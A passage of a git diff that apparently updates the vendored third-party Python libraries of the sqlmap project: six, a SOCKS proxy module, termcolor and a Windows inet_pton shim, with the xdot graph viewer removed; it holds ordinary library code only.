kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). + resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + return type.__new__(metaclass, 'temporary_class', (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get('__slots__') + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop('__dict__', None) + orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + return wrapper + + +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if '__str__' not in klass.__dict__: + raise ValueError("@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % + klass.__name__) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode('utf-8') + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) +if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if (type(importer).__name__ == "_SixMetaPathImporter" and + importer.name == __name__): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/thirdparty/socks/socks.py b/thirdparty/socks/socks.py index e164ced407d..065f90e0869 100644 --- a/thirdparty/socks/socks.py +++ b/thirdparty/socks/socks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """SocksiPy - Python SOCKS module. -Version 1.00 +Version 1.01 Copyright 2006 Dan-Haim. All rights reserved. @@ -33,7 +33,7 @@ """ """ -Minor modifications made by Miroslav Stampar (http://sqlmap.org/) +Minor modifications made by Miroslav Stampar (https://sqlmap.org) for patching DNS-leakage occuring in socket.create_connection() Minor modifications made by Christopher Gilbert (http://motomastyle.com/) @@ -44,6 +44,7 @@ """ +import functools import socket import struct @@ -52,7 +53,8 @@ PROXY_TYPE_HTTP = 3 _defaultproxy = None -_orgsocket = socket.socket +socket._orig_socket = _orgsocket = _orig_socket = socket.socket +_orgcreateconnection = socket.create_connection class ProxyError(Exception): pass class GeneralProxyError(ProxyError): pass @@ -106,15 +108,40 @@ def wrapmodule(module): This will only work on modules that import socket directly into the namespace; most of the Python Standard Library falls into this category. """ - if _defaultproxy != None: - module.socket.socket = socksocket - module.socket.create_connection = create_connection + if _defaultproxy is not None: + _orig_socket_ctor = _orgsocket + + @functools.wraps(_orig_socket_ctor) + def guarded_socket(*args, **kwargs): + # socket.socket([family[, type[, proto]]]) + family = args[0] if len(args) > 0 else kwargs.get("family", socket.AF_INET) + stype = args[1] if len(args) > 1 else kwargs.get("type", socket.SOCK_STREAM) + + # Normalize socket type by stripping flags (Py3.3+ may OR these in) + flags = 0 + flags |= getattr(socket, "SOCK_CLOEXEC", 0) + flags |= getattr(socket, "SOCK_NONBLOCK", 0) + base_type = stype & ~flags + + if family in (socket.AF_INET, getattr(socket, "AF_INET6", socket.AF_INET)) and base_type == socket.SOCK_STREAM: + return socksocket(*args, **kwargs) + + # Fallback: don't proxy AF_UNIX / raw / etc. + return _orig_socket_ctor(*args, **kwargs) + + module.socket.socket = guarded_socket + + if _defaultproxy[0] == PROXY_TYPE_SOCKS4: + # Note: unable to prevent DNS leakage in SOCKS4 (Reference: https://security.stackexchange.com/a/171280) + pass + else: + module.socket.create_connection = create_connection else: raise GeneralProxyError((4, "no proxy specified")) def unwrapmodule(module): - module.socket.socket = socket.socket - module.socket.create_connection = socket.create_connection + module.socket.socket = _orgsocket + module.socket.create_connection = _orgcreateconnection class socksocket(socket.socket): """socksocket([family[, type[, proto]]]) -> socket object @@ -180,23 +207,23 @@ def __negotiatesocks5(self, destaddr, destport): # We'll receive the server's response to determine which # method was selected chosenauth = self.__recvall(2) - if chosenauth[0:1] != chr(0x05).encode(): + if chosenauth[0:1] != b'\x05': self.close() raise GeneralProxyError((1, _generalerrors[1])) # Check the chosen authentication method - if chosenauth[1:2] == chr(0x00).encode(): + if chosenauth[1:2] == b'\x00': # No authentication is required pass - elif chosenauth[1:2] == chr(0x02).encode(): + elif chosenauth[1:2] == b'\x02': # Okay, we need to perform a basic username/password # authentication. - self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5]) + self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode()) authstat = self.__recvall(2) - if authstat[0:1] != chr(0x01).encode(): + if authstat[0:1] != b'\x01': # Bad response self.close() raise GeneralProxyError((1, _generalerrors[1])) - if authstat[1:2] != chr(0x00).encode(): + if authstat[1:2] != b'\x00': # Authentication failed self.close() raise Socks5AuthError((3, _socks5autherrors[3])) @@ -204,7 +231,7 @@ def __negotiatesocks5(self, destaddr, destport): else: # Reaching here is always bad self.close() - if chosenauth[1] == chr(0xFF).encode(): + if chosenauth[1:2] == b'\xff': raise Socks5AuthError((2, _socks5autherrors[2])) else: raise GeneralProxyError((1, _generalerrors[1])) @@ -214,13 +241,13 @@ def __negotiatesocks5(self, destaddr, destport): # use the IPv4 address request even if remote resolving was specified. try: ipaddr = socket.inet_aton(destaddr) - req = req + chr(0x01).encode() + ipaddr + req = req + b'\x01' + ipaddr except socket.error: # Well it's not an IP number, so it's probably a DNS name. if self.__proxy[3]: # Resolve remotely ipaddr = None - req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr + req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (destaddr if isinstance(destaddr, bytes) else destaddr.encode()) else: # Resolve locally ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) diff --git a/thirdparty/termcolor/termcolor.py b/thirdparty/termcolor/termcolor.py index f11b824b287..ddea6dd59f2 100644 --- a/thirdparty/termcolor/termcolor.py +++ b/thirdparty/termcolor/termcolor.py @@ -79,6 +79,11 @@ )) ) +COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS)) + +# Reference: https://misc.flogisoft.com/bash/tip_colors_and_formatting +COLORS["lightgrey"] = 37 +COLORS["darkgrey"] = 90 RESET = '\033[0m' diff --git a/thirdparty/wininetpton/__init__.py b/thirdparty/wininetpton/__init__.py new file mode 100644 index 00000000000..5ea298dc195 --- /dev/null +++ b/thirdparty/wininetpton/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# +# Copyright Ryan Vennell +# +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +pass diff --git a/thirdparty/wininetpton/win_inet_pton.py b/thirdparty/wininetpton/win_inet_pton.py new file mode 100644 index 00000000000..50ae621e53b --- /dev/null +++ b/thirdparty/wininetpton/win_inet_pton.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +import socket +import ctypes +import os + + +class sockaddr(ctypes.Structure): + _fields_ = [("sa_family", ctypes.c_short), + ("__pad1", ctypes.c_ushort), + ("ipv4_addr", ctypes.c_byte * 4), + ("ipv6_addr", ctypes.c_byte * 16), + ("__pad2", ctypes.c_ulong)] + +if hasattr(ctypes, 'windll'): + WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA + WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA +else: + def not_windows(): + raise SystemError( + "Invalid platform. ctypes.windll must be available." + ) + WSAStringToAddressA = not_windows + WSAAddressToStringA = not_windows + + +def inet_pton(address_family, ip_string): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + + if WSAStringToAddressA( + ip_string, + address_family, + None, + ctypes.byref(addr), + ctypes.byref(addr_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + if address_family == socket.AF_INET: + return ctypes.string_at(addr.ipv4_addr, 4) + if address_family == socket.AF_INET6: + return ctypes.string_at(addr.ipv6_addr, 16) + + raise socket.error('unknown address family') + + +def inet_ntop(address_family, packed_ip): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + ip_string = ctypes.create_string_buffer(128) + ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) + + if address_family == socket.AF_INET: + if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv4_addr, packed_ip, 4) + elif address_family == socket.AF_INET6: + if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv6_addr, packed_ip, 16) + else: + raise socket.error('unknown address family') + + if WSAAddressToStringA( + ctypes.byref(addr), + addr_size, + None, + ip_string, + ctypes.byref(ip_string_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + return ip_string[:ip_string_size.value - 1] + +# Adding our two functions to the socket library +if os.name == 'nt': + socket.inet_pton = inet_pton + socket.inet_ntop = inet_ntop diff --git a/thirdparty/xdot/__init__.py b/thirdparty/xdot/__init__.py deleted file mode 100644 index c1a869589f3..00000000000 --- a/thirdparty/xdot/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python -# -# Copyright 2008-2009 Jose Fonseca -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . -# - -pass diff --git a/thirdparty/xdot/xdot.py b/thirdparty/xdot/xdot.py deleted file mode 100644 index 4bc94640e0f..00000000000 --- a/thirdparty/xdot/xdot.py +++ /dev/null @@ -1,2159 +0,0 @@ -#!/usr/bin/env python -# -# Copyright 2008 Jose Fonseca -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . -# - -'''Visualize dot graphs via the xdot Format.''' - -__author__ = "Jose Fonseca" - -__version__ = "0.4" - - -import os -import sys -import subprocess -import math -import colorsys -import time -import re - -import gobject -import gtk -import gtk.gdk -import gtk.keysyms -import cairo -import pango -import pangocairo - - -# See http://www.graphviz.org/pub/scm/graphviz-cairo/plugin/cairo/gvrender_cairo.c - -# For pygtk inspiration and guidance see: -# - http://mirageiv.berlios.de/ -# - http://comix.sourceforge.net/ - - -class Pen: - """Store pen attributes.""" - - def __init__(self): - # set default attributes - self.color = (0.0, 0.0, 0.0, 1.0) - self.fillcolor = (0.0, 0.0, 0.0, 1.0) - self.linewidth = 1.0 - self.fontsize = 14.0 - self.fontname = "Times-Roman" - self.dash = () - - def copy(self): - """Create a copy of this pen.""" - pen = Pen() - pen.__dict__ = self.__dict__.copy() - return pen - - def highlighted(self): - pen = self.copy() - pen.color = (1, 0, 0, 1) - pen.fillcolor = (1, .8, .8, 1) - return pen - - -class Shape: - """Abstract base class for all the drawing shapes.""" - - def __init__(self): - pass - - def draw(self, cr, highlight=False): - """Draw this shape with the given cairo context""" - raise NotImplementedError - - def select_pen(self, highlight): - if highlight: - if not hasattr(self, 'highlight_pen'): - self.highlight_pen = self.pen.highlighted() - return self.highlight_pen - else: - return self.pen - - -class TextShape(Shape): - - #fontmap = pangocairo.CairoFontMap() - #fontmap.set_resolution(72) - #context = fontmap.create_context() - - LEFT, CENTER, RIGHT = -1, 0, 1 - - def __init__(self, pen, x, y, j, w, t): - Shape.__init__(self) - self.pen = pen.copy() - self.x = x - self.y = y - self.j = j - self.w = w - self.t = t - - def draw(self, cr, highlight=False): - - try: - layout = self.layout - except AttributeError: - layout = cr.create_layout() - - # set font options - # see http://lists.freedesktop.org/archives/cairo/2007-February/009688.html - context = layout.get_context() - fo = cairo.FontOptions() - fo.set_antialias(cairo.ANTIALIAS_DEFAULT) - fo.set_hint_style(cairo.HINT_STYLE_NONE) - fo.set_hint_metrics(cairo.HINT_METRICS_OFF) - try: - pangocairo.context_set_font_options(context, fo) - except TypeError: - # XXX: Some broken pangocairo bindings show the error - # 'TypeError: font_options must be a cairo.FontOptions or None' - pass - - # set font - font = pango.FontDescription() - font.set_family(self.pen.fontname) - font.set_absolute_size(self.pen.fontsize*pango.SCALE) - layout.set_font_description(font) - - # set text - layout.set_text(self.t) - - # cache it - self.layout = layout - else: - cr.update_layout(layout) - - descent = 2 # XXX get descender from font metrics - - width, height = layout.get_size() - width = float(width)/pango.SCALE - height = float(height)/pango.SCALE - # we know the width that dot thinks this text should have - # we do not necessarily have a font with the same metrics - # scale it so that the text fits inside its box - if width > self.w: - f = self.w / width - width = self.w # equivalent to width *= f - height *= f - descent *= f - else: - f = 1.0 - - if self.j == self.LEFT: - x = self.x - elif self.j == self.CENTER: - x = self.x - 0.5*width - elif self.j == self.RIGHT: - x = self.x - width - else: - assert 0 - - y = self.y - height + descent - - cr.move_to(x, y) - - cr.save() - cr.scale(f, f) - cr.set_source_rgba(*self.select_pen(highlight).color) - cr.show_layout(layout) - cr.restore() - - if 0: # DEBUG - # show where dot thinks the text should appear - cr.set_source_rgba(1, 0, 0, .9) - if self.j == self.LEFT: - x = self.x - elif self.j == self.CENTER: - x = self.x - 0.5*self.w - elif self.j == self.RIGHT: - x = self.x - self.w - cr.move_to(x, self.y) - cr.line_to(x+self.w, self.y) - cr.stroke() - - -class EllipseShape(Shape): - - def __init__(self, pen, x0, y0, w, h, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.x0 = x0 - self.y0 = y0 - self.w = w - self.h = h - self.filled = filled - - def draw(self, cr, highlight=False): - cr.save() - cr.translate(self.x0, self.y0) - cr.scale(self.w, self.h) - cr.move_to(1.0, 0.0) - cr.arc(0.0, 0.0, 1.0, 0, 2.0*math.pi) - cr.restore() - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class PolygonShape(Shape): - - def __init__(self, pen, points, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - self.filled = filled - - def draw(self, cr, highlight=False): - x0, y0 = self.points[-1] - cr.move_to(x0, y0) - for x, y in self.points: - cr.line_to(x, y) - cr.close_path() - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill_preserve() - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class LineShape(Shape): - - def __init__(self, pen, points): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - - def draw(self, cr, highlight=False): - x0, y0 = self.points[0] - cr.move_to(x0, y0) - for x1, y1 in self.points[1:]: - cr.line_to(x1, y1) - pen = self.select_pen(highlight) - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class BezierShape(Shape): - - def __init__(self, pen, points, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - self.filled = filled - - def draw(self, cr, highlight=False): - x0, y0 = self.points[0] - cr.move_to(x0, y0) - for i in xrange(1, len(self.points), 3): - x1, y1 = self.points[i] - x2, y2 = self.points[i + 1] - x3, y3 = self.points[i + 2] - cr.curve_to(x1, y1, x2, y2, x3, y3) - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill_preserve() - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class CompoundShape(Shape): - - def __init__(self, shapes): - Shape.__init__(self) - self.shapes = shapes - - def draw(self, cr, highlight=False): - for shape in self.shapes: - shape.draw(cr, highlight=highlight) - - -class Url(object): - - def __init__(self, item, url, highlight=None): - self.item = item - self.url = url - if highlight is None: - highlight = set([item]) - self.highlight = highlight - - -class Jump(object): - - def __init__(self, item, x, y, highlight=None): - self.item = item - self.x = x - self.y = y - if highlight is None: - highlight = set([item]) - self.highlight = highlight - - -class Element(CompoundShape): - """Base class for graph nodes and edges.""" - - def __init__(self, shapes): - CompoundShape.__init__(self, shapes) - - def get_url(self, x, y): - return None - - def get_jump(self, x, y): - return None - - -class Node(Element): - - def __init__(self, x, y, w, h, shapes, url): - Element.__init__(self, shapes) - - self.x = x - self.y = y - - self.x1 = x - 0.5*w - self.y1 = y - 0.5*h - self.x2 = x + 0.5*w - self.y2 = y + 0.5*h - - self.url = url - - def is_inside(self, x, y): - return self.x1 <= x and x <= self.x2 and self.y1 <= y and y <= self.y2 - - def get_url(self, x, y): - if self.url is None: - return None - #print (x, y), (self.x1, self.y1), "-", (self.x2, self.y2) - if self.is_inside(x, y): - return Url(self, self.url) - return None - - def get_jump(self, x, y): - if self.is_inside(x, y): - return Jump(self, self.x, self.y) - return None - - -def square_distance(x1, y1, x2, y2): - deltax = x2 - x1 - deltay = y2 - y1 - return deltax*deltax + deltay*deltay - - -class Edge(Element): - - def __init__(self, src, dst, points, shapes): - Element.__init__(self, shapes) - self.src = src - self.dst = dst - self.points = points - - RADIUS = 10 - - def get_jump(self, x, y): - if square_distance(x, y, *self.points[0]) <= self.RADIUS*self.RADIUS: - return Jump(self, self.dst.x, self.dst.y, highlight=set([self, self.dst])) - if square_distance(x, y, *self.points[-1]) <= self.RADIUS*self.RADIUS: - return Jump(self, self.src.x, self.src.y, highlight=set([self, self.src])) - return None - - -class Graph(Shape): - - def __init__(self, width=1, height=1, shapes=(), nodes=(), edges=()): - Shape.__init__(self) - - self.width = width - self.height = height - self.shapes = shapes - self.nodes = nodes - self.edges = edges - - def get_size(self): - return self.width, self.height - - def draw(self, cr, highlight_items=None): - if highlight_items is None: - highlight_items = () - cr.set_source_rgba(0.0, 0.0, 0.0, 1.0) - - cr.set_line_cap(cairo.LINE_CAP_BUTT) - cr.set_line_join(cairo.LINE_JOIN_MITER) - - for shape in self.shapes: - shape.draw(cr) - for edge in self.edges: - edge.draw(cr, highlight=(edge in highlight_items)) - for node in self.nodes: - node.draw(cr, highlight=(node in highlight_items)) - - def get_url(self, x, y): - for node in self.nodes: - url = node.get_url(x, y) - if url is not None: - return url - return None - - def get_jump(self, x, y): - for edge in self.edges: - jump = edge.get_jump(x, y) - if jump is not None: - return jump - for node in self.nodes: - jump = node.get_jump(x, y) - if jump is not None: - return jump - return None - - -class XDotAttrParser: - """Parser for xdot drawing attributes. - See also: - - http://www.graphviz.org/doc/info/output.html#d:xdot - """ - - def __init__(self, parser, buf): - self.parser = parser - self.buf = self.unescape(buf) - self.pos = 0 - - self.pen = Pen() - self.shapes = [] - - def __nonzero__(self): - return self.pos < len(self.buf) - - def unescape(self, buf): - buf = buf.replace('\\"', '"') - buf = buf.replace('\\n', '\n') - return buf - - def read_code(self): - pos = self.buf.find(" ", self.pos) - res = self.buf[self.pos:pos] - self.pos = pos + 1 - while self.pos < len(self.buf) and self.buf[self.pos].isspace(): - self.pos += 1 - return res - - def read_number(self): - return int(self.read_code()) - - def read_float(self): - return float(self.read_code()) - - def read_point(self): - x = self.read_number() - y = self.read_number() - return self.transform(x, y) - - def read_text(self): - num = self.read_number() - pos = self.buf.find("-", self.pos) + 1 - self.pos = pos + num - res = self.buf[pos:self.pos] - while self.pos < len(self.buf) and self.buf[self.pos].isspace(): - self.pos += 1 - return res - - def read_polygon(self): - n = self.read_number() - p = [] - for i in range(n): - x, y = self.read_point() - p.append((x, y)) - return p - - def read_color(self): - # See http://www.graphviz.org/doc/info/attrs.html#k:color - c = self.read_text() - c1 = c[:1] - if c1 == '#': - hex2float = lambda h: float(int(h, 16)/255.0) - r = hex2float(c[1:3]) - g = hex2float(c[3:5]) - b = hex2float(c[5:7]) - try: - a = hex2float(c[7:9]) - except (IndexError, ValueError): - a = 1.0 - return r, g, b, a - elif c1.isdigit() or c1 == ".": - # "H,S,V" or "H S V" or "H, S, V" or any other variation - h, s, v = map(float, c.replace(",", " ").split()) - r, g, b = colorsys.hsv_to_rgb(h, s, v) - a = 1.0 - return r, g, b, a - else: - return self.lookup_color(c) - - def lookup_color(self, c): - try: - color = gtk.gdk.color_parse(c) - except ValueError: - pass - else: - s = 1.0/65535.0 - r = color.red*s - g = color.green*s - b = color.blue*s - a = 1.0 - return r, g, b, a - - try: - dummy, scheme, index = c.split('/') - r, g, b = brewer_colors[scheme][int(index)] - except (ValueError, KeyError): - pass - else: - s = 1.0/255.0 - r = r*s - g = g*s - b = b*s - a = 1.0 - return r, g, b, a - - sys.stderr.write("unknown color '%s'\n" % c) - return None - - def parse(self): - s = self - - while s: - op = s.read_code() - if op == "c": - color = s.read_color() - if color is not None: - self.handle_color(color, filled=False) - elif op == "C": - color = s.read_color() - if color is not None: - self.handle_color(color, filled=True) - elif op == "S": - # http://www.graphviz.org/doc/info/attrs.html#k:style - style = s.read_text() - if style.startswith("setlinewidth("): - lw = style.split("(")[1].split(")")[0] - lw = float(lw) - self.handle_linewidth(lw) - elif style in ("solid", "dashed"): - self.handle_linestyle(style) - elif op == "F": - size = s.read_float() - name = s.read_text() - self.handle_font(size, name) - elif op == "T": - x, y = s.read_point() - j = s.read_number() - w = s.read_number() - t = s.read_text() - self.handle_text(x, y, j, w, t) - elif op == "E": - x0, y0 = s.read_point() - w = s.read_number() - h = s.read_number() - self.handle_ellipse(x0, y0, w, h, filled=True) - elif op == "e": - x0, y0 = s.read_point() - w = s.read_number() - h = s.read_number() - self.handle_ellipse(x0, y0, w, h, filled=False) - elif op == "L": - points = self.read_polygon() - self.handle_line(points) - elif op == "B": - points = self.read_polygon() - self.handle_bezier(points, filled=False) - elif op == "b": - points = self.read_polygon() - self.handle_bezier(points, filled=True) - elif op == "P": - points = self.read_polygon() - self.handle_polygon(points, filled=True) - elif op == "p": - points = self.read_polygon() - self.handle_polygon(points, filled=False) - else: - sys.stderr.write("unknown xdot opcode '%s'\n" % op) - break - - return self.shapes - - def transform(self, x, y): - return self.parser.transform(x, y) - - def handle_color(self, color, filled=False): - if filled: - self.pen.fillcolor = color - else: - self.pen.color = color - - def handle_linewidth(self, linewidth): - self.pen.linewidth = linewidth - - def handle_linestyle(self, style): - if style == "solid": - self.pen.dash = () - elif style == "dashed": - self.pen.dash = (6, ) # 6pt on, 6pt off - - def handle_font(self, size, name): - self.pen.fontsize = size - self.pen.fontname = name - - def handle_text(self, x, y, j, w, t): - self.shapes.append(TextShape(self.pen, x, y, j, w, t)) - - def handle_ellipse(self, x0, y0, w, h, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(EllipseShape(self.pen, x0, y0, w, h, filled=True)) - self.shapes.append(EllipseShape(self.pen, x0, y0, w, h)) - - def handle_line(self, points): - self.shapes.append(LineShape(self.pen, points)) - - def handle_bezier(self, points, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(BezierShape(self.pen, points, filled=True)) - self.shapes.append(BezierShape(self.pen, points)) - - def handle_polygon(self, points, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(PolygonShape(self.pen, points, filled=True)) - self.shapes.append(PolygonShape(self.pen, points)) - - -EOF = -1 -SKIP = -2 - - -class ParseError(Exception): - - def __init__(self, msg=None, filename=None, line=None, col=None): - self.msg = msg - self.filename = filename - self.line = line - self.col = col - - def __str__(self): - return ':'.join([str(part) for part in (self.filename, self.line, self.col, self.msg) if part != None]) - - -class Scanner: - """Stateless scanner.""" - - # should be overriden by derived classes - tokens = [] - symbols = {} - literals = {} - ignorecase = False - - def __init__(self): - flags = re.DOTALL - if self.ignorecase: - flags |= re.IGNORECASE - self.tokens_re = re.compile( - '|'.join(['(' + regexp + ')' for type, regexp, test_lit in self.tokens]), - flags - ) - - def next(self, buf, pos): - if pos >= len(buf): - return EOF, '', pos - mo = self.tokens_re.match(buf, pos) - if mo: - text = mo.group() - type, regexp, test_lit = self.tokens[mo.lastindex - 1] - pos = mo.end() - if test_lit: - type = self.literals.get(text, type) - return type, text, pos - else: - c = buf[pos] - return self.symbols.get(c, None), c, pos + 1 - - -class Token: - - def __init__(self, type, text, line, col): - self.type = type - self.text = text - self.line = line - self.col = col - - -class Lexer: - - # should be overriden by derived classes - scanner = None - tabsize = 8 - - newline_re = re.compile(r'\r\n?|\n') - - def __init__(self, buf = None, pos = 0, filename = None, fp = None): - if fp is not None: - try: - fileno = fp.fileno() - length = os.path.getsize(fp.name) - import mmap - except: - # read whole file into memory - buf = fp.read() - pos = 0 - else: - # map the whole file into memory - if length: - # length must not be zero - buf = mmap.mmap(fileno, length, access = mmap.ACCESS_READ) - pos = os.lseek(fileno, 0, 1) - else: - buf = '' - pos = 0 - - if filename is None: - try: - filename = fp.name - except AttributeError: - filename = None - - self.buf = buf - self.pos = pos - self.line = 1 - self.col = 1 - self.filename = filename - - def next(self): - while True: - # save state - pos = self.pos - line = self.line - col = self.col - - type, text, endpos = self.scanner.next(self.buf, pos) - assert pos + len(text) == endpos - self.consume(text) - type, text = self.filter(type, text) - self.pos = endpos - - if type == SKIP: - continue - elif type is None: - msg = 'unexpected char ' - if text >= ' ' and text <= '~': - msg += "'%s'" % text - else: - msg += "0x%X" % ord(text) - raise ParseError(msg, self.filename, line, col) - else: - break - return Token(type = type, text = text, line = line, col = col) - - def consume(self, text): - # update line number - pos = 0 - for mo in self.newline_re.finditer(text, pos): - self.line += 1 - self.col = 1 - pos = mo.end() - - # update column number - while True: - tabpos = text.find('\t', pos) - if tabpos == -1: - break - self.col += tabpos - pos - self.col = ((self.col - 